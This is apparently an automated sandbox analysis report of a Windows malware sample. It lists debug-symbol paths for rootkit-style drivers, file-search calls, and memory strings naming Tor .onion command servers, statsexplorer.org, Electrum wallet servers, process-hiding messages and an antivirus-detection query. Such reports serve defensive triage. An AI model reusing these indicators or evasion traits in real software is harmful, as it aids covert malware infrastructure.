Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: vueqjgslwynd.exe, 0000001B.00000003.1474933632.000001EBD15A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: Unable to locate the .pdb file in this location source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: The module signature does not match with .pdb signature. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: .pdb.dbg source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: '(EfiGuardDxe.pdbx source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: symsrv.pdbGCTL source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003ED8000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000035E9000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000C7A000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\xericuzakiziy64\dayolev xadesowip kijo.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000000.1358564663.0000000000807000.00000002.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000000.1462221086.0000000000807000.00000002.00000001.01000000.00000006.sdmp
                        Source: Binary string: or you do not have access permission to the .pdb location. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: EfiGuardDxe.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: dbghelp.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: dbghelp.pdbGCTL source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405C63
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_004068B4 FindFirstFileW,FindClose,3_2_004068B4
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_00402910 FindFirstFileW,3_2_00402910

                        Networking

                        Source: unknownDNS query: name: pastebin.com
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C194000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C194000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: .P19152c2014093e313d075d110f3d082e50http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionhttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7SELECT Name FROM Win32_ProcessorIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7c:\users\user\appdata\local\temp\288c47bbc1871b439df19ff4df68f076.exe"C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe" C:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.msc
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: HKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionSELECT displayName FROM AntiVirusProductEastern Standard Time
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: b001d03091c1310114b0c1a02HKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003advapi32.dlla839a7d71a2dee1828e0f2b62022350439b4f41ccabc2a7c6affe16e329df454a839a7d71a2dee1828e0f2b62022350439b4f41ccabc2a7c6affe16e329df454advapi32.dllServiceVersionServiceVersionServersVersionServersVersionDistributorIDConnectServerWindows DefenderConnectServer.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC.com;.exe;.bat;.cmd;.vbs;.vbe;.js;.jse;.wsf;.wsh;.mscpowershell.compowershell.exepowershell.batpowershell.cmdpowershell.vbspowershell.vbepowershell.jspowershell.jsepowershell.wsfpowershell.wshpowershell.mscC:\Program Files (x86)\Common Files\Oracle\Java\javapath\user-PCWbemScripting.SWbemLocatorhttps://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionWbemScripting.SWbemLocatorWbemScripting.SWbemLocatorcurrent filenname with args "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal 